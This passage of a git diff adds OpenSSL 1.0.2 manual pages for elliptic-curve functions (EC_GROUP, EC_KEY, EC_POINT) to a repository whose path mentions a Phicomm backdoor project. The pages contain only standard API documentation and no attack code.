+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_POINT_add(3)|EC_POINT_add(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>,
+L<BN_mod_mul_montgomery(3)|BN_mod_mul_montgomery(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GROUP_copy.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GROUP_copy.pod
new file mode 100644
index 0000000..954af46
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GROUP_copy.pod
@@ -0,0 +1,174 @@
+=pod
+
+=head1 NAME
+
+EC_GROUP_copy, EC_GROUP_dup, EC_GROUP_method_of, EC_GROUP_set_generator, EC_GROUP_get0_generator, EC_GROUP_get_order, EC_GROUP_get_cofactor, EC_GROUP_set_curve_name, EC_GROUP_get_curve_name, EC_GROUP_set_asn1_flag, EC_GROUP_get_asn1_flag, EC_GROUP_set_point_conversion_form, EC_GROUP_get_point_conversion_form, EC_GROUP_get0_seed, EC_GROUP_get_seed_len, EC_GROUP_set_seed, EC_GROUP_get_degree, EC_GROUP_check, EC_GROUP_check_discriminant, EC_GROUP_cmp, EC_GROUP_get_basis_type, EC_GROUP_get_trinomial_basis, EC_GROUP_get_pentanomial_basis - Functions for manipulating B<EC_GROUP> objects.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+ #include <openssl/bn.h>
+
+ int EC_GROUP_copy(EC_GROUP *dst, const EC_GROUP *src);
+ EC_GROUP *EC_GROUP_dup(const EC_GROUP *src);
+
+ const EC_METHOD *EC_GROUP_method_of(const EC_GROUP *group);
+
+ int EC_GROUP_set_generator(EC_GROUP *group, const EC_POINT *generator, const BIGNUM *order, const BIGNUM *cofactor);
+ const EC_POINT *EC_GROUP_get0_generator(const EC_GROUP *group);
+
+ int EC_GROUP_get_order(const EC_GROUP *group, BIGNUM *order, BN_CTX *ctx);
+ int EC_GROUP_get_cofactor(const EC_GROUP *group, BIGNUM *cofactor, BN_CTX *ctx);
+
+ void EC_GROUP_set_curve_name(EC_GROUP *group, int nid);
+ int EC_GROUP_get_curve_name(const EC_GROUP *group);
+
+ void EC_GROUP_set_asn1_flag(EC_GROUP *group, int flag);
+ int EC_GROUP_get_asn1_flag(const EC_GROUP *group);
+
+ void EC_GROUP_set_point_conversion_form(EC_GROUP *group, point_conversion_form_t form);
+ point_conversion_form_t EC_GROUP_get_point_conversion_form(const EC_GROUP *);
+
+ unsigned char *EC_GROUP_get0_seed(const EC_GROUP *x);
+ size_t EC_GROUP_get_seed_len(const EC_GROUP *);
+ size_t EC_GROUP_set_seed(EC_GROUP *, const unsigned char *, size_t len);
+
+ int EC_GROUP_get_degree(const EC_GROUP *group);
+
+ int EC_GROUP_check(const EC_GROUP *group, BN_CTX *ctx);
+
+ int EC_GROUP_check_discriminant(const EC_GROUP *group, BN_CTX *ctx);
+
+ int EC_GROUP_cmp(const EC_GROUP *a, const EC_GROUP *b, BN_CTX *ctx);
+
+ int EC_GROUP_get_basis_type(const EC_GROUP *);
+ int EC_GROUP_get_trinomial_basis(const EC_GROUP *, unsigned int *k);
+ int EC_GROUP_get_pentanomial_basis(const EC_GROUP *, unsigned int *k1, 
+	unsigned int *k2, unsigned int *k3);
+
+=head1 DESCRIPTION
+
+EC_GROUP_copy copies the curve B<src> into B<dst>. Both B<src> and B<dst> must use the same EC_METHOD.
+
+EC_GROUP_dup creates a new EC_GROUP object and copies the content from B<src> to the newly created
+EC_GROUP object.
+
+EC_GROUP_method_of obtains the EC_METHOD of B<group>.
+
+EC_GROUP_set_generator sets curve paramaters that must be agreed by all participants using the curve. These
+paramaters include the B<generator>, the B<order> and the B<cofactor>. The B<generator> is a well defined point on the
+curve chosen for cryptographic operations. Integers used for point multiplications will be between 0 and
+n-1 where n is the B<order>. The B<order> multipied by the B<cofactor> gives the number of points on the curve.
+
+EC_GROUP_get0_generator returns the generator for the identified B<group>.
+
+The functions EC_GROUP_get_order and EC_GROUP_get_cofactor populate the provided B<order> and B<cofactor> parameters
+with the respective order and cofactors for the B<group>.
+
+The functions EC_GROUP_set_curve_name and EC_GROUP_get_curve_name, set and get the NID for the curve respectively
+(see L<EC_GROUP_new(3)|EC_GROUP_new(3)>). If a curve does not have a NID associated with it, then EC_GROUP_get_curve_name
+will return 0.
+
+The asn1_flag value on a curve is used to determine whether there is a specific ASN1 OID to describe the curve or not.
+If the asn1_flag is 1 then this is a named curve with an associated ASN1 OID. If not then asn1_flag is 0. The functions
+EC_GROUP_get_asn1_flag and EC_GROUP_set_asn1_flag get and set the status of the asn1_flag for the curve. If set then
+the curve_name must also be set.
+
+The point_coversion_form for a curve controls how EC_POINT data is encoded as ASN1 as defined in X9.62 (ECDSA).
+point_conversion_form_t is an enum defined as follows: 
+
+ typedef enum {
+	/** the point is encoded as z||x, where the octet z specifies 
+	 *   which solution of the quadratic equation y is  */
+	POINT_CONVERSION_COMPRESSED = 2,
+	/** the point is encoded as z||x||y, where z is the octet 0x02  */
+	POINT_CONVERSION_UNCOMPRESSED = 4,
+	/** the point is encoded as z||x||y, where the octet z specifies
+         *  which solution of the quadratic equation y is  */
+	POINT_CONVERSION_HYBRID = 6
+ } point_conversion_form_t;
+
+ 
+For POINT_CONVERSION_UNCOMPRESSED the point is encoded as an octet signifying the UNCOMPRESSED form has been used followed by
+the octets for x, followed by the octets for y.
+
+For any given x co-ordinate for a point on a curve it is possible to derive two possible y values. For
+POINT_CONVERSION_COMPRESSED the point is encoded as an octet signifying that the COMPRESSED form has been used AND which of
+the two possible solutions for y has been used, followed by the octets for x. 
+
+For POINT_CONVERSION_HYBRID the point is encoded as an octet signifying the HYBRID form has been used AND which of the two
+possible solutions for y has been used, followed by the octets for x, followed by the octets for y.
+
+The functions EC_GROUP_set_point_conversion_form and EC_GROUP_get_point_conversion_form set and get the point_conversion_form
+for the curve respectively.
+
+ANSI X9.62 (ECDSA standard) defines a method of generating the curve parameter b from a random number. This provides advantages
+in that a parameter obtained in this way is highly unlikely to be susceptible to special purpose attacks, or have any trapdoors in it.
+If the seed is present for a curve then the b parameter was generated in a verifiable fashion using that seed. The OpenSSL EC library
+does not use this seed value but does enable you to inspect it using EC_GROUP_get0_seed. This returns a pointer to a memory block
+containing the seed that was used. The length of the memory block can be obtained using EC_GROUP_get_seed_len. A number of the
+builtin curves within the library provide seed values that can be obtained. It is also possible to set a custom seed using
+EC_GROUP_set_seed and passing a pointer to a memory block, along with the length of the seed. Again, the EC library will not use
+this seed value, although it will be preserved in any ASN1 based communications.
+
+EC_GROUP_get_degree gets the degree of the field. For Fp fields this will be the number of bits in p.  For F2^m fields this will be
+the value m.
+
+The function EC_GROUP_check_discriminant calculates the discriminant for the curve and verifies that it is valid.
+For a curve defined over Fp the discriminant is given by the formula 4*a^3 + 27*b^2 whilst for F2^m curves the discriminant is
+simply b. In either case for the curve to be valid the discriminant must be non zero.
+
+The function EC_GROUP_check performs a number of checks on a curve to verify that it is valid. Checks performed include
+verifying that the discriminant is non zero; that a generator has been defined; that the generator is on the curve and has
+the correct order.
+
+EC_GROUP_cmp compares B<a> and B<b> to determine whether they represent the same curve or not.
+
+The functions EC_GROUP_get_basis_type, EC_GROUP_get_trinomial_basis and EC_GROUP_get_pentanomial_basis should only be called for curves
+defined over an F2^m field. Addition and multiplication operations within an F2^m field are performed using an irreducible polynomial
+function f(x). This function is either a trinomial of the form:
+
+f(x) = x^m + x^k + 1 with m > k >= 1
+
+or a pentanomial of the form:
+
+f(x) = x^m + x^k3 + x^k2 + x^k1 + 1 with m > k3 > k2 > k1 >= 1
+
+The function EC_GROUP_get_basis_type returns a NID identifying whether a trinomial or pentanomial is in use for the field. The
+function EC_GROUP_get_trinomial_basis must only be called where f(x) is of the trinomial form, and returns the value of B<k>. Similary
+the function EC_GROUP_get_pentanomial_basis must only be called where f(x) is of the pentanomial form, and returns the values of B<k1>,
+B<k2> and B<k3> respectively.
+
+=head1 RETURN VALUES
+
+The following functions return 1 on success or 0 on error: EC_GROUP_copy, EC_GROUP_set_generator, EC_GROUP_check,
+EC_GROUP_check_discriminant, EC_GROUP_get_trinomial_basis and EC_GROUP_get_pentanomial_basis.
+
+EC_GROUP_dup returns a pointer to the duplicated curve, or NULL on error.
+
+EC_GROUP_method_of returns the EC_METHOD implementation in use for the given curve or NULL on error.
+
+EC_GROUP_get0_generator returns the generator for the given curve or NULL on error.
+
+EC_GROUP_get_order, EC_GROUP_get_cofactor, EC_GROUP_get_curve_name, EC_GROUP_get_asn1_flag, EC_GROUP_get_point_conversion_form
+and EC_GROUP_get_degree return the order, cofactor, curve name (NID), ASN1 flag, point_conversion_form and degree for the
+specified curve respectively. If there is no curve name associated with a curve then EC_GROUP_get_curve_name will return 0.
+
+EC_GROUP_get0_seed returns a pointer to the seed that was used to generate the parameter b, or NULL if the seed is not
+specified. EC_GROUP_get_seed_len returns the length of the seed or 0 if the seed is not specified.
+
+EC_GROUP_set_seed returns the length of the seed that has been set. If the supplied seed is NULL, or the supplied seed length is
+0, the the return value will be 1. On error 0 is returned.
+
+EC_GROUP_cmp returns 0 if the curves are equal, 1 if they are not equal, or -1 on error.
+
+EC_GROUP_get_basis_type returns the values NID_X9_62_tpBasis or NID_X9_62_ppBasis (as defined in <openssl/obj_mac.h>) for a
+trinomial or pentanomial respectively. Alternatively in the event of an error a 0 is returned.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_POINT_add(3)|EC_POINT_add(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GROUP_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GROUP_new.pod
new file mode 100644
index 0000000..ff55bf3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_GROUP_new.pod
@@ -0,0 +1,95 @@
+=pod
+
+=head1 NAME
+
+EC_GROUP_new, EC_GROUP_free, EC_GROUP_clear_free, EC_GROUP_new_curve_GFp, EC_GROUP_new_curve_GF2m, EC_GROUP_new_by_curve_name, EC_GROUP_set_curve_GFp, EC_GROUP_get_curve_GFp, EC_GROUP_set_curve_GF2m, EC_GROUP_get_curve_GF2m, EC_get_builtin_curves - Functions for creating and destroying B<EC_GROUP> objects.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+ #include <openssl/bn.h>
+
+ EC_GROUP *EC_GROUP_new(const EC_METHOD *meth);
+ void EC_GROUP_free(EC_GROUP *group);
+ void EC_GROUP_clear_free(EC_GROUP *group);
+
+ EC_GROUP *EC_GROUP_new_curve_GFp(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ EC_GROUP *EC_GROUP_new_curve_GF2m(const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ EC_GROUP *EC_GROUP_new_by_curve_name(int nid);
+
+ int EC_GROUP_set_curve_GFp(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_get_curve_GFp(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_set_curve_GF2m(EC_GROUP *group, const BIGNUM *p, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
+ int EC_GROUP_get_curve_GF2m(const EC_GROUP *group, BIGNUM *p, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+
+ size_t EC_get_builtin_curves(EC_builtin_curve *r, size_t nitems);
+
+=head1 DESCRIPTION
+
+Within the library there are two forms of elliptic curve that are of interest. The first form is those defined over the
+prime field Fp. The elements of Fp are the integers 0 to p-1, where p is a prime number. This gives us a revised
+elliptic curve equation as follows:
+
+y^2 mod p = x^3 +ax + b mod p
+
+The second form is those defined over a binary field F2^m where the elements of the field are integers of length at
+most m bits. For this form the elliptic curve equation is modified to:
+
+y^2 + xy = x^3 + ax^2 + b (where b != 0)
+
+Operations in a binary field are performed relative to an B<irreducible polynomial>. All such curves with OpenSSL
+use a trinomial or a pentanomial for this parameter.
+
+A new curve can be constructed by calling EC_GROUP_new, using the implementation provided by B<meth> (see
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>). It is then necessary to call either EC_GROUP_set_curve_GFp or
+EC_GROUP_set_curve_GF2m as appropriate to create a curve defined over Fp or over F2^m respectively. 
+
+EC_GROUP_set_curve_GFp sets the curve parameters B<p>, B<a> and B<b> for a curve over Fp stored in B<group>.
+EC_group_get_curve_GFp obtains the previously set curve parameters.
+
+EC_GROUP_set_curve_GF2m sets the equivalent curve parameters for a curve over F2^m. In this case B<p> represents
+the irreducible polybnomial - each bit represents a term in the polynomial. Therefore there will either be three
+or five bits set dependant on whether the polynomial is a trinomial or a pentanomial.
+EC_group_get_curve_GF2m obtains the previously set curve parameters.
+
+The functions EC_GROUP_new_curve_GFp and EC_GROUP_new_curve_GF2m are shortcuts for calling EC_GROUP_new and the
+appropriate EC_group_set_curve function. An appropriate default implementation method will be used.
+
+Whilst the library can be used to create any curve using the functions described above, there are also a number of
+predefined curves that are available. In order to obtain a list of all of the predefined curves, call the function
+EC_get_builtin_curves. The parameter B<r> should be an array of EC_builtin_curve structures of size B<nitems>. The function
+will populate the B<r> array with information about the builtin curves. If B<nitems> is less than the total number of
+curves available, then the first B<nitems> curves will be returned. Otherwise the total number of curves will be
+provided. The return value is the total number of curves available (whether that number has been populated in B<r> or
+not). Passing a NULL B<r>, or setting B<nitems> to 0 will do nothing other than return the total number of curves available.
+The EC_builtin_curve structure is defined as follows:
+
+ typedef struct { 
+	int nid;
+	const char *comment;
+	} EC_builtin_curve;
+
+Each EC_builtin_curve item has a unique integer id (B<nid>), and a human readable comment string describing the curve.
+
+In order to construct a builtin curve use the function EC_GROUP_new_by_curve_name and provide the B<nid> of the curve to
+be constructed.
+
+EC_GROUP_free frees the memory associated with the EC_GROUP.
+
+EC_GROUP_clear_free destroys any sensitive data held within the EC_GROUP and then frees its memory.
+
+=head1 RETURN VALUES
+
+All EC_GROUP_new* functions return a pointer to the newly constructed group, or NULL on error.
+
+EC_get_builtin_curves returns the number of builtin curves that are available.
+
+EC_GROUP_set_curve_GFp, EC_GROUP_get_curve_GFp, EC_GROUP_set_curve_GF2m, EC_GROUP_get_curve_GF2m return 1 on success or 0 on error.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_POINT_add(3)|EC_POINT_add(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_KEY_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_KEY_new.pod
new file mode 100644
index 0000000..2027569
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_KEY_new.pod
@@ -0,0 +1,120 @@
+=pod
+
+=head1 NAME
+
+EC_KEY_new, EC_KEY_get_flags, EC_KEY_set_flags, EC_KEY_clear_flags, EC_KEY_new_by_curve_name, EC_KEY_free, EC_KEY_copy, EC_KEY_dup, EC_KEY_up_ref, EC_KEY_get0_group, EC_KEY_set_group, EC_KEY_get0_private_key, EC_KEY_set_private_key, EC_KEY_get0_public_key, EC_KEY_set_public_key, EC_KEY_get_enc_flags, EC_KEY_set_enc_flags, EC_KEY_get_conv_form, EC_KEY_set_conv_form, EC_KEY_get_key_method_data, EC_KEY_insert_key_method_data, EC_KEY_set_asn1_flag, EC_KEY_precompute_mult, EC_KEY_generate_key, EC_KEY_check_key, EC_KEY_set_public_key_affine_coordinates - Functions for creating, destroying and manipulating B<EC_KEY> objects.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+ #include <openssl/bn.h>
+
+ EC_KEY *EC_KEY_new(void);
+ int EC_KEY_get_flags(const EC_KEY *key);
+ void EC_KEY_set_flags(EC_KEY *key, int flags);
+ void EC_KEY_clear_flags(EC_KEY *key, int flags);
+ EC_KEY *EC_KEY_new_by_curve_name(int nid);
+ void EC_KEY_free(EC_KEY *key);
+ EC_KEY *EC_KEY_copy(EC_KEY *dst, const EC_KEY *src);
+ EC_KEY *EC_KEY_dup(const EC_KEY *src);
+ int EC_KEY_up_ref(EC_KEY *key);
+ const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key);
+ int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group);
+ const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key);
+ int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *prv);
+ const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key);
+ int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub);
+ unsigned int EC_KEY_get_enc_flags(const EC_KEY *key);
+ void EC_KEY_set_enc_flags(EC_KEY *eckey, unsigned int flags);
+ point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key);
+ void EC_KEY_set_conv_form(EC_KEY *eckey, point_conversion_form_t cform);
+ void *EC_KEY_get_key_method_data(EC_KEY *key, 
+	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
+ void EC_KEY_insert_key_method_data(EC_KEY *key, void *data,
+	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
+ void EC_KEY_set_asn1_flag(EC_KEY *eckey, int asn1_flag);
+ int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx);
+ int EC_KEY_generate_key(EC_KEY *key);
+ int EC_KEY_check_key(const EC_KEY *key);
+ int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x, BIGNUM *y);
+
+=head1 DESCRIPTION
+
+An EC_KEY represents a public key and (optionaly) an associated private key. A new EC_KEY (with no associated curve) can be constructed by calling EC_KEY_new.
+The reference count for the newly created EC_KEY is initially set to 1. A curve can be associated with the EC_KEY by calling
+EC_KEY_set_group.
+
+Alternatively a new EC_KEY can be constructed by calling EC_KEY_new_by_curve_name and supplying the nid of the associated curve. Refer to L<EC_GROUP_new(3)|EC_GROUP_new(3)> for a description of curve names. This function simply wraps calls to EC_KEY_new and 
+EC_GROUP_new_by_curve_name.
+
+Calling EC_KEY_free decrements the reference count for the EC_KEY object, and if it has dropped to zero then frees the memory associated
+with it.
+
+EC_KEY_copy copies the contents of the EC_KEY in B<src> into B<dest>.
+
+EC_KEY_dup creates a new EC_KEY object and copies B<ec_key> into it.
+
+EC_KEY_up_ref increments the reference count associated with the EC_KEY object.
+
+EC_KEY_generate_key generates a new public and private key for the supplied B<eckey> object. B<eckey> must have an EC_GROUP object
+associated with it before calling this function. The private key is a random integer (0 < priv_key < order, where order is the order
+of the EC_GROUP object). The public key is an EC_POINT on the curve calculated by multiplying the generator for the curve by the
+private key.
+
+EC_KEY_check_key performs various sanity checks on the EC_KEY object to confirm that it is valid.
+
+EC_KEY_set_public_key_affine_coordinates sets the public key for B<key> based on its affine co-ordinates, i.e. it constructs an EC_POINT
+object based on the supplied B<x> and B<y> values and sets the public key to be this EC_POINT. It will also performs certain sanity checks
+on the key to confirm that it is valid.
+
+The functions EC_KEY_get0_group, EC_KEY_set_group, EC_KEY_get0_private_key, EC_KEY_set_private_key, EC_KEY_get0_public_key, and EC_KEY_set_public_key get and set the EC_GROUP object, the private key and the EC_POINT public key for the B<key> respectively.
+
+The functions EC_KEY_get_enc_flags and EC_KEY_set_enc_flags get and set the value of the encoding flags for the B<key>. There are two encoding
+flags currently defined - EC_PKEY_NO_PARAMETERS and EC_PKEY_NO_PUBKEY.  These flags define the behaviour of how the  B<key> is
+converted into ASN1 in a call to i2d_ECPrivateKey. If EC_PKEY_NO_PARAMETERS is set then the public parameters for the curve are not encoded
+along with the private key. If EC_PKEY_NO_PUBKEY is set then the public key is not encoded along with the private key.
+
+When reading a private key encoded with EC_PKEY_NO_PUBKEY,
+d2i_ECPrivateKey generates the missing public key
+automatically. Private keys encoded with EC_PKEY_NO_PARAMETERS cannot
+be loaded using d2i_ECPrivateKey.
+
+The functions EC_KEY_get_conv_form and EC_KEY_set_conv_form get and set the point_conversion_form for the B<key>. For a description
+of point_conversion_forms please refer to L<EC_POINT_new(3)|EC_POINT_new(3)>.
+
+EC_KEY_insert_key_method_data and EC_KEY_get_key_method_data enable the caller to associate arbitary additional data specific to the
+elliptic curve scheme being used with the EC_KEY object. This data is treated as a "black box" by the ec library. The data to be stored by EC_KEY_insert_key_method_data is provided in the B<data> parameter, which must have have associated functions for duplicating, freeing and "clear_freeing" the data item. If a subsequent EC_KEY_get_key_method_data call is issued, the functions for duplicating, freeing and "clear_freeing" the data item must be provided again, and they must be the same as they were when the data item was inserted.
+
+EC_KEY_set_flags sets the flags in the B<flags> parameter on the EC_KEY object. Any flags that are already set are left set. The currently defined standard flags are EC_FLAG_NON_FIPS_ALLOW and EC_FLAG_FIPS_CHECKED. In addition there is the flag EC_FLAG_COFACTOR_ECDH which is specific to ECDH and is defined in ecdh.h. EC_KEY_get_flags returns the current flags that are set for this EC_KEY. EC_KEY_clear_flags clears the flags indicated by the B<flags> parameter. All other flags are left in their existing state.
+
+EC_KEY_set_asn1_flag sets the asn1_flag on the underlying EC_GROUP object (if set). Refer to L<EC_GROUP_copy(3)|EC_GROUP_copy(3)> for further information on the asn1_flag.
+
+EC_KEY_precompute_mult stores multiples of the underlying EC_GROUP generator for faster point multiplication. See also L<EC_POINT_add(3)|EC_POINT_add(3)>.
+
+
+=head1 RETURN VALUES
+
+EC_KEY_new, EC_KEY_new_by_curve_name and EC_KEY_dup return a pointer to the newly created EC_KEY object, or NULL on error.
+
+EC_KEY_get_flags returns the flags associated with the EC_KEY object as an integer.
+
+EC_KEY_copy returns a pointer to the destination key, or NULL on error.
+
+EC_KEY_up_ref, EC_KEY_set_group, EC_KEY_set_private_key, EC_KEY_set_public_key, EC_KEY_precompute_mult, EC_KEY_generate_key, EC_KEY_check_key and EC_KEY_set_public_key_affine_coordinates return 1 on success or 0 on error.
+
+EC_KEY_get0_group returns the EC_GROUP associated with the EC_KEY.
+
+EC_KEY_get0_private_key returns the private key associated with the EC_KEY.
+
+EC_KEY_get_enc_flags returns the value of the current encoding flags for the EC_KEY.
+
+EC_KEY_get_conv_form return the point_conversion_form for the EC_KEY.
+
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_POINT_add(3)|EC_POINT_add(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_POINT_add.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_POINT_add.pod
new file mode 100644
index 0000000..ae92640
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_POINT_add.pod
@@ -0,0 +1,72 @@
+=pod
+
+=head1 NAME
+
+EC_POINT_add, EC_POINT_dbl, EC_POINT_invert, EC_POINT_is_at_infinity, EC_POINT_is_on_curve, EC_POINT_cmp, EC_POINT_make_affine, EC_POINTs_make_affine, EC_POINTs_mul, EC_POINT_mul, EC_GROUP_precompute_mult, EC_GROUP_have_precompute_mult - Functions for performing mathematical operations and tests on B<EC_POINT> objects.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+ #include <openssl/bn.h>
+
+ int EC_POINT_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
+ int EC_POINT_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a, BN_CTX *ctx);
+ int EC_POINT_invert(const EC_GROUP *group, EC_POINT *a, BN_CTX *ctx);
+ int EC_POINT_is_at_infinity(const EC_GROUP *group, const EC_POINT *p);
+ int EC_POINT_is_on_curve(const EC_GROUP *group, const EC_POINT *point, BN_CTX *ctx);
+ int EC_POINT_cmp(const EC_GROUP *group, const EC_POINT *a, const EC_POINT *b, BN_CTX *ctx);
+ int EC_POINT_make_affine(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx);
+ int EC_POINTs_make_affine(const EC_GROUP *group, size_t num, EC_POINT *points[], BN_CTX *ctx);
+ int EC_POINTs_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, size_t num, const EC_POINT *p[], const BIGNUM *m[], BN_CTX *ctx);
+ int EC_POINT_mul(const EC_GROUP *group, EC_POINT *r, const BIGNUM *n, const EC_POINT *q, const BIGNUM *m, BN_CTX *ctx);
+ int EC_GROUP_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
+ int EC_GROUP_have_precompute_mult(const EC_GROUP *group);
+
+
+=head1 DESCRIPTION
+
+EC_POINT_add adds the two points B<a> and B<b> and places the result in B<r>. Similarly EC_POINT_dbl doubles the point B<a> and places the
+result in B<r>. In both cases it is valid for B<r> to be one of B<a> or B<b>.
+
+EC_POINT_invert calculates the inverse of the supplied point B<a>. The result is placed back in B<a>.
+
+The function EC_POINT_is_at_infinity tests whether the supplied point is at infinity or not.
+
+EC_POINT_is_on_curve tests whether the supplied point is on the curve or not.
+
+EC_POINT_cmp compares the two supplied points and tests whether or not they are equal.
+
+The functions EC_POINT_make_affine and EC_POINTs_make_affine force the internal representation of the EC_POINT(s) into the affine
+co-ordinate system. In the case of EC_POINTs_make_affine the value B<num> provides the number of points in the array B<points> to be
+forced.
+
+EC_POINT_mul calculates the value generator * B<n> + B<q> * B<m> and stores the result in B<r>. The value B<n> may be NULL in which case the result is just B<q> * B<m>.
+
+EC_POINTs_mul calculates the value generator * B<n> + B<q[0]> * B<m[0]> + ... + B<q[num-1]> * B<m[num-1]>. As for EC_POINT_mul the value
+B<n> may be NULL.
+
+The function EC_GROUP_precompute_mult stores multiples of the generator for faster point multiplication, whilst
+EC_GROUP_have_precompute_mult tests whether precomputation has already been done. See L<EC_GROUP_copy(3)|EC_GROUP_copy(3)> for information
+about the generator.
+
+
+=head1 RETURN VALUES
+
+The following functions return 1 on success or 0 on error: EC_POINT_add, EC_POINT_dbl, EC_POINT_invert, EC_POINT_make_affine,
+EC_POINTs_make_affine, EC_POINTs_make_affine, EC_POINT_mul, EC_POINTs_mul and EC_GROUP_precompute_mult.
+
+EC_POINT_is_at_infinity returns 1 if the point is at infinity, or 0 otherwise.
+
+EC_POINT_is_on_curve returns 1 if the point is on the curve, 0 if not, or -1 on error.
+
+EC_POINT_cmp returns 1 if the points are not equal, 0 if they are, or -1 on error.
+
+EC_GROUP_have_precompute_mult return 1 if a precomputation has been done, or 0 if not.
+
+=head1 SEE ALSO
+
+L<crypto(3)|crypto(3)>, L<ec(3)|ec(3)>, L<EC_GROUP_new(3)|EC_GROUP_new(3)>, L<EC_GROUP_copy(3)|EC_GROUP_copy(3)>,
+L<EC_POINT_new(3)|EC_POINT_new(3)>, L<EC_KEY_new(3)|EC_KEY_new(3)>,
+L<EC_GFp_simple_method(3)|EC_GFp_simple_method(3)>, L<d2i_ECPKParameters(3)|d2i_ECPKParameters(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_POINT_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_POINT_new.pod
new file mode 100644
index 0000000..69eb0d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EC_POINT_new.pod
@@ -0,0 +1,123 @@
+=pod
+
+=head1 NAME
+
+EC_POINT_new, EC_POINT_free, EC_POINT_clear_free, EC_POINT_copy, EC_POINT_dup, EC_POINT_method_of, EC_POINT_set_to_infinity, EC_POINT_set_Jprojective_coordinates, EC_POINT_get_Jprojective_coordinates_GFp, EC_POINT_set_affine_coordinates_GFp, EC_POINT_get_affine_coordinates_GFp, EC_POINT_set_compressed_coordinates_GFp, EC_POINT_set_affine_coordinates_GF2m, EC_POINT_get_affine_coordinates_GF2m, EC_POINT_set_compressed_coordinates_GF2m, EC_POINT_point2oct, EC_POINT_oct2point, EC_POINT_point2bn, EC_POINT_bn2point, EC_POINT_point2hex, EC_POINT_hex2point - Functions for creating, destroying and manipulating B<EC_POINT> objects.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ec.h>
+ #include <openssl/bn.h>
+
+ EC_POINT *EC_POINT_new(const EC_GROUP *group);
